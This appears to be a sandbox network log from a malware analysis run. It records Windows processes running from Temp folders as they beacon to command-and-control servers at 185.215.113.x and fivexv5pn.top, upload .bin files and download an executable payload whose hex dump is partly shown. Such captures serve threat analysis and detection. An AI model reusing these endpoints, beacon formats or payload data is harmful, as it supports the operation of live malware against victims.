Sep 3, 2024 17:13:48.171461105 CEST	1236	IN	Data Raw: 50 03 00 04 28 3d 06 00 06 20 00 00 00 00 7e 09 03 00 04 7b cd 02 00 04 3a 8e ff ff ff 26 20 00 00 00 00 38 83 ff ff ff 00 38 05 01 00 00 38 44 00 00 00 38 3f 00 00 00 38 00 00 00 00 00 73 bd 03 00 06 13 0a 20 04 00 00 00 fe 0e 0c 00 38 54 ff ff Data Ascii: P(= ~{:& 888D8?8s 8T ~{9?& 84s%~P(=%~Q(A 8~:(o5 ~{9& 8:\ 8
Sep 3, 2024 17:13:48.171472073 CEST	1236	IN	Data Raw: 06 13 04 38 00 00 00 00 11 04 2a 00 41 4c 00 00 00 00 00 00 6d 00 00 00 ae 00 00 00 1b 01 00 00 08 00 00 00 12 00 00 01 00 00 00 00 3f 00 00 00 21 01 00 00 60 01 00 00 09 00 00 00 16 00 00 01 00 00 00 00 07 00 00 00 68 01 00 00 6f 01 00 00 09 00 Data Ascii: 8ALm?!`ho0 8EB98=~ ~{:& 8888(v@ 8EL
Sep 3, 2024 17:13:48.171483994 CEST	776	IN	Data Raw: 00 00 38 1d fe ff ff 11 01 28 16 00 00 06 13 0c 38 48 00 00 00 11 01 28 16 00 00 06 13 05 38 55 ff ff ff 38 ca 00 00 00 38 b8 ff ff ff 00 11 03 17 58 13 03 20 0a 00 00 00 7e 09 03 00 04 7b 24 03 00 04 39 dc fd ff ff 26 20 04 00 00 00 38 d1 fd ff Data Ascii: 8(8H(8U88X ~{$9& 888~9 ~{9& 888d989s 8z 8i8F ~{:O& 8D 83
Sep 3, 2024 17:13:48.171494961 CEST	1236	IN	Data Raw: d0 02 00 00 02 28 17 00 00 06 18 8d 38 00 00 01 25 16 16 14 28 56 00 00 0a a2 25 17 17 14 28 19 00 00 06 a2 28 53 00 00 0a 28 54 00 00 0a 80 0e 00 00 04 7e 0e 00 00 04 7b 55 00 00 0a 7e 0e 00 00 04 11 01 7e 43 03 00 04 28 09 06 00 06 28 0b 00 00 Data Ascii: (8%(V%((S(T~{U~~C((+p~((oWq~((oWoXoY ~{9& 8v8h 8^9:8%( ~{95& 8*
Sep 3, 2024 17:13:48.173036098 CEST	224	IN	Data Raw: 38 c3 ff ff ff 00 00 00 00 02 28 34 00 00 06 28 35 00 00 06 13 01 38 12 00 00 00 fe 0c 08 00 45 01 00 00 00 2f 03 00 00 38 2a 03 00 00 00 38 99 01 00 00 20 06 00 00 00 38 04 00 00 00 fe 0c 0a 00 45 0c 00 00 00 27 02 00 00 94 01 00 00 d6 00 00 00 Data Ascii: 8(4(58E/8*8 8E'S3KD8"(9opoq(6or(s(:~>( 8~?(rpop(+~;(
Sep 3, 2024 17:13:48.173046112 CEST	1236	IN	Data Raw: 05 00 06 20 02 00 00 00 38 54 ff ff ff 11 00 11 02 28 36 00 00 06 7e 3c 03 00 04 28 ed 05 00 06 20 03 00 00 00 7e 09 03 00 04 7b bb 02 00 04 39 2d ff ff ff 26 20 0a 00 00 00 38 22 ff ff ff 11 01 6f 6f 00 00 0a 74 41 00 00 01 13 02 20 01 00 00 00 Data Ascii: 8T(6~<( ~{9-& 8"ootA ~{:& 8otc~(((u8otd~(((88(6~;( 8(7b~(((u8a(;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49763	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:48.118858099 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:48.934799910 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:48.936638117 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:49.208847046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49764	195.133.48.136	80	7044	C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:49.008157969 CEST	332	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary86491233 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 410 Host: fivexv5pn.top
Sep 3, 2024 17:13:49.008184910 CEST	410	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 36 34 39 31 32 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 61 6b Data Ascii: ------Boundary86491233Content-Disposition: form-data; name="file"; filename="Kakawo.bin"Content-Type: application/octet-streamxExLj-3[)&}ih+_W]d=H_JRIBn\[ySf,cwBhQ6\|x<
Sep 3, 2024 17:13:49.793891907 CEST	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Tue, 03 Sep 2024 15:13:49 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK
Sep 3, 2024 17:13:53.613574028 CEST	334	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary40392606 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 77712 Host: fivexv5pn.top
Sep 3, 2024 17:13:53.613647938 CEST	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 30 33 39 32 36 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 6f 6d Data Ascii: ------Boundary40392606Content-Disposition: form-data; name="file"; filename="Tomudepu.bin"Content-Type: application/octet-stream9)^V0^o8bg83w*u. 9#iJa+7CO`J%]J~oc+'].~(6c
Sep 3, 2024 17:13:53.622039080 CEST	2472	OUT	Data Raw: 75 0e ae be b3 c7 4d 38 cf 04 fb ae 77 f1 f7 2e 6b b8 25 a2 37 fd 32 17 b4 a0 83 5e d1 04 d2 83 c1 b4 5e 31 1c d4 66 f8 1a 58 5a 0e 5b db 46 b5 6b 3e a5 73 aa 76 35 30 a1 f6 ff ea 50 1c 6b a5 fb e1 3c 36 7b 1e 63 3d ff 2d 0a 8d 63 da e6 48 9b fb Data Ascii: uM8w.k%72^^1fXZ[Fk>sv50Pk<6{c=-cH\CE^:/9&f*fR]Z'B5O9c^9/YDu6rp7"6oO{Yzbo1b/)8gZn2Fa+/$-S"<coT%Nqn-
Sep 3, 2024 17:13:53.622076988 CEST	7416	OUT	Data Raw: c7 56 73 02 ca 5e f7 7c 6c 35 dc fa 85 8d 8b 6d 15 75 5e da bb 04 f1 a0 bc 50 60 b9 0a 57 fa 97 64 24 43 7a 3f 39 d1 55 99 40 cc 13 23 d3 3d f8 fd 78 fa 93 4f 09 53 d0 28 2b 0f 7c cd 2d 31 a2 7d e6 b6 be 49 8e f5 43 32 e7 db b3 67 bc 9b 70 8f 7c Data Ascii: Vs^\|l5mu^P`Wd$Cz?9U@#=xOS(+\|-1}IC2gp\|.D}tO{I>8`%RHrQ0Nu/zIDvLgrG\Y8rRlERnm?pYLx)H#9FD3e,D_:w
Sep 3, 2024 17:13:53.622638941 CEST	4944	OUT	Data Raw: 26 9e 83 b9 0e 5f ac 9a ca 95 7e 41 8f 2b 8a 7d 93 62 a1 46 7e 44 81 62 87 ec 79 b4 4b 4f 81 4e 33 27 f8 b6 cb ba 3d 65 08 23 e2 a5 2f d3 10 93 f4 1c 51 95 15 ff 72 52 dd c8 85 36 d8 8c 6d cd a4 9f ee cb df 8d 4c 95 2b 93 6f 5b 9c 5a 8c e6 53 0a Data Ascii: &_~A+}bF~DbyKON3'=e#/QrR6mL+o[ZS<\|iN7J1%=<Ww<+P@L~uP'f+Tk]zZ]G/h^w}J=dCMe4m{Vf.(pb9k!cUr-f
Sep 3, 2024 17:13:53.622663021 CEST	4944	OUT	Data Raw: 79 7b a0 d8 38 6f 84 73 50 38 d9 c3 66 d0 21 87 27 70 ad 00 74 05 73 5b 81 b1 cf 86 f3 33 6d 81 ca 3e 0d 28 84 12 5e 02 7c 1c 54 3d 23 06 63 34 f1 1e 24 a3 9c 04 4a f3 36 bf fd 9a 2c f7 c1 af 7b 32 eb fd c9 91 ec 20 25 89 9d d2 90 ad 93 50 3d e6 Data Ascii: y{8osP8f!'pts[3m>(^\|T=#c4$J6,{2 %P=7iq\|)rtV&_JnwRHK:o@}BIp$M{\&d[0mS(A{o?&sBDcMwY#B1NKR\|1 &szlTtE2EdC
Sep 3, 2024 17:13:53.622677088 CEST	4944	OUT	Data Raw: 6e 5c fb 5d 95 e2 a9 f7 24 e5 ec f2 bb eb 52 77 27 91 f1 0e 0b 37 34 70 04 b4 a5 06 a6 7e 9f 7e 74 d0 94 f8 71 92 80 53 3c bd 83 c3 7e fe 8e 36 57 21 7b 24 d8 6e 08 3a 13 79 3a 37 f1 ff 13 e1 9f 75 49 4b c8 6b c1 3c dd 06 81 f6 7d 78 aa 78 ca f8 Data Ascii: n\]$Rw'74p~~tqS<~6W!{$n:y:7uIKk<}xx~L^$~P;z(;Z18#y*By,j2csqTN]N4m.a}YY?\|pL~RlbYjR-rOXf^U%na9s)S`$$
Sep 3, 2024 17:13:53.630619049 CEST	4944	OUT	Data Raw: 78 2f 2d 36 d2 1e 54 ab 6f ee 1b e1 3c 56 a9 fc dd c2 b6 5a ca 9c c6 b4 91 c7 f9 f0 39 f6 a8 7d b5 f9 0a 96 24 be 6f 03 be 3c c1 60 38 40 98 40 b9 4b cf 8c a1 4c d2 34 7e 6d 25 21 d4 c6 7f bd 85 2b 8d 25 82 7d 2b 8d b7 f1 8f 0a 92 25 70 74 a9 a2 Data Ascii: x/-6To<VZ9}$o<`8@@KL4~m%!+%}+%ptUE8}CA~ojZBt@l0?@')NC45ZC$OJi>R}:5oG3I3IOZ!KCu)Cu8\Y%"r\|
Sep 3, 2024 17:13:53.630645990 CEST	2472	OUT	Data Raw: ec 62 ad f4 43 cb 36 18 5c 33 fb 46 0f 8c 08 a8 3f e4 07 52 5c d4 87 c9 fd ee 9a 82 f4 c0 63 85 ae f4 5b 0f 68 90 48 26 09 36 27 d0 6d b5 ab de 29 3a 26 6e 85 b5 79 e2 7e a6 37 8b 98 47 15 c1 37 98 bb fe 3c 1e 5e 6f 97 67 93 a4 ce 15 88 c8 d7 ee Data Ascii: bC6\3F?R\c[hH&6'm):&ny~7G7<^og0c%T)*;4p2#FDGPPQU/p9d5M:_EqGiKSb{DxJ81Agae}!>{E-mL0r
Sep 3, 2024 17:13:53.630882978 CEST	2472	OUT	Data Raw: 64 36 1b 05 7c 48 5b c5 cb b1 5c c6 b7 87 3b 6b 5e 00 81 0d 36 d6 55 6f dc a5 19 be 7d e6 8d a3 09 cc e7 0a 05 e4 b9 2a 05 80 e5 ea d7 07 ae d4 e1 46 98 ad af 84 15 e9 91 c6 bd b3 5a ab b0 ff 7f ee 4c e5 a7 96 e8 24 07 0a 01 25 16 76 80 6a ee 83 Data Ascii: d6\|H[\;k^6Uo}*FZL$%vj.<q^fuyGV0XG][V6HFc/4Z%xne>>Tl-]<D"S8YTRy>YoWiU,fj9G(`k:4YiC- cO
Sep 3, 2024 17:13:54.123311043 CEST	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Tue, 03 Sep 2024 15:13:54 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK
Sep 3, 2024 17:14:05.623801947 CEST	334	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary70400459 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30045 Host: fivexv5pn.top
Sep 3, 2024 17:14:05.900284052 CEST	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Tue, 03 Sep 2024 15:14:05 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49765	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:49.336025000 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:50.158982992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:50.159847021 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:50.428117990 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49766	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:49.351623058 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000241001&unit=246122658369
Sep 3, 2024 17:13:50.165735006 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 3, 2024 17:13:50.167001963 CEST	55	OUT	GET /inc/runtime.exe HTTP/1.1 Host: 185.215.113.16
Sep 3, 2024 17:13:50.423446894 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:50 GMT Content-Type: application/octet-stream Content-Length: 45056 Last-Modified: Mon, 02 Sep 2024 16:24:47 GMT Connection: keep-alive ETag: "66d5e6cf-b000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 05 49 ba 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a6 00 00 00 08 00 00 00 00 00 00 8e c4 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3a c4 00 00 4f 00 00 00 00 e0 00 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 98 c3 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELI"0 @ @:O8 H.text `.rsrc@@.reloc@BnH1xJ y~}~}~}(({t}6s(0>{rpoo&{((}(0!{((}(0!{((}(0!{((}(0!{((}(*0!{((
Sep 3, 2024 17:13:50.423463106 CEST	1236	IN	Data Raw: 00 0a 7d 01 00 00 04 02 28 11 00 00 06 2a 00 00 00 13 30 03 00 21 00 00 00 01 00 00 11 02 02 7b 01 00 00 04 1d 0a 12 00 28 19 00 00 0a 28 1a 00 00 0a 7d 01 00 00 04 02 28 11 00 00 06 2a 00 00 00 13 30 03 00 21 00 00 00 01 00 00 11 02 02 7b 01 00 Data Ascii: }(0!{((}(0!{((}(0"{((}(0!{((}(*{X}{2({
Sep 3, 2024 17:13:50.423576117 CEST	1236	IN	Data Raw: 12 00 00 04 02 73 28 00 00 0a 7d 13 00 00 04 02 73 28 00 00 0a 7d 14 00 00 04 02 73 28 00 00 0a 7d 15 00 00 04 02 73 28 00 00 0a 7d 16 00 00 04 02 73 28 00 00 0a 7d 17 00 00 04 02 73 28 00 00 0a 7d 18 00 00 04 02 73 29 00 00 0a 7d 19 00 00 04 02 Data Ascii: s(}s(}s(}s(}s(}s(}s)}s(}((*{(+o,{ @Ys-o.{rpo/{Ks0o1{"o2{rpo{o3{s4o5
Sep 3, 2024 17:13:50.423588037 CEST	1236	IN	Data Raw: 32 00 00 0a 02 7b 12 00 00 04 72 91 01 00 70 6f 1b 00 00 0a 02 7b 12 00 00 04 17 6f 33 00 00 0a 02 7b 12 00 00 04 02 fe 06 06 00 00 06 73 34 00 00 0a 6f 35 00 00 0a 02 7b 13 00 00 04 20 de 00 00 00 1f 76 73 2d 00 00 0a 6f 2e 00 00 0a 02 7b 13 00 Data Ascii: 2{rpo{o3{s4o5{ vs-o.{rpo/{Ks0o1{o2{rpo{o3{s4o5{{vs-o.{rpo/{Ks0o1{o
Sep 3, 2024 17:13:50.423599005 CEST	1236	IN	Data Raw: 28 41 00 00 0a 02 7b 0f 00 00 04 6f 42 00 00 0a 02 28 41 00 00 0a 02 7b 10 00 00 04 6f 42 00 00 0a 02 28 41 00 00 0a 02 7b 11 00 00 04 6f 42 00 00 0a 02 28 41 00 00 0a 02 7b 12 00 00 04 6f 42 00 00 0a 02 28 41 00 00 0a 02 7b 13 00 00 04 6f 42 00 Data Ascii: (A{oB(A{oB(A{oB(A{oB(A{oB(A{oB(A{oB(A{oB(A{oB(A{oBr1poCt8(DrGp(/rp(Ergpos4(F
Sep 3, 2024 17:13:50.423610926 CEST	820	IN	Data Raw: 21 00 00 00 00 81 00 29 00 50 01 07 00 4c 21 00 00 00 00 81 00 39 00 50 01 09 00 7c 21 00 00 00 00 81 00 49 00 50 01 0b 00 ac 21 00 00 00 00 81 00 22 05 50 01 0d 00 dc 21 00 00 00 00 81 00 30 05 50 01 0f 00 0c 22 00 00 00 00 81 00 3e 05 50 01 11 Data Ascii: !)PL!9P\|!IP!"P!0P">P<"LPl"P"xP"hP#YPY#zP#}#qP#iP!(%ZP#u%%%
Sep 3, 2024 17:13:50.423755884 CEST	1236	IN	Data Raw: 00 51 01 1b 02 70 00 89 00 f2 01 7b 00 b9 00 4b 07 83 00 a1 00 4b 07 06 00 a9 00 4b 07 06 00 29 01 30 09 06 00 61 01 67 06 89 00 29 01 0f 07 8f 00 71 01 4b 07 96 00 29 01 f7 05 9c 00 29 01 04 02 10 00 79 01 4b 07 96 00 29 01 a7 04 a3 00 29 01 c8 Data Ascii: Qp{KKK)0ag)qK))yK))K)a)aa)>a)Kw)U])N)X)e/cK
Sep 3, 2024 17:13:50.423768044 CEST	1236	IN	Data Raw: 65 00 54 72 79 50 61 72 73 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 53 74 61 74 65 00 53 54 41 54 68 72 65 61 64 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 Data Ascii: eTryParseEditorBrowsableStateSTAThreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTra
Sep 3, 2024 17:13:50.426023006 CEST	1236	IN	Data Raw: 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e Data Ascii: DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesCalculator.CalculatorForm1.resourcesCalculator.Properties.Resources.resourcesDebuggingModesCalculator.PropertiesEnableVisualStylesSettingsEventAr
Sep 3, 2024 17:13:50.426035881 CEST	1236	IN	Data Raw: 00 2e 00 49 00 63 00 6f 00 6e 00 00 1f 43 00 61 00 6c 00 63 00 75 00 6c 00 61 00 74 00 6f 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 1b 43 00 68 00 61 00 72 00 70 00 75 00 72 00 73 00 20 00 43 00 61 00 6c 00 63 00 00 3f 43 00 61 00 6c 00 63 00 75 Data Ascii: .IconCalculatorForm1Charpurs Calc?Calculator.Properties.ResourcesF#K5LKM y
Sep 3, 2024 17:13:50.426047087 CEST	1236	IN	Data Raw: 69 00 73 00 2e 00 49 00 63 00 6f 00 6e 00 00 00 00 00 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 Data Ascii: is.Icon@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.IconIconDataIconSizeSystem.Drawing.SizeSystem.Drawing.Sizewidthh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49767	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:50.767632008 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:51.576690912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:51.577827930 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:51.840334892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49768	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:51.534982920 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000243001&unit=246122658369
Sep 3, 2024 17:13:52.333483934 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	49769	185.215.113.19	80	3628	C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe

Timestamp	Bytes transferred	Direction	Data
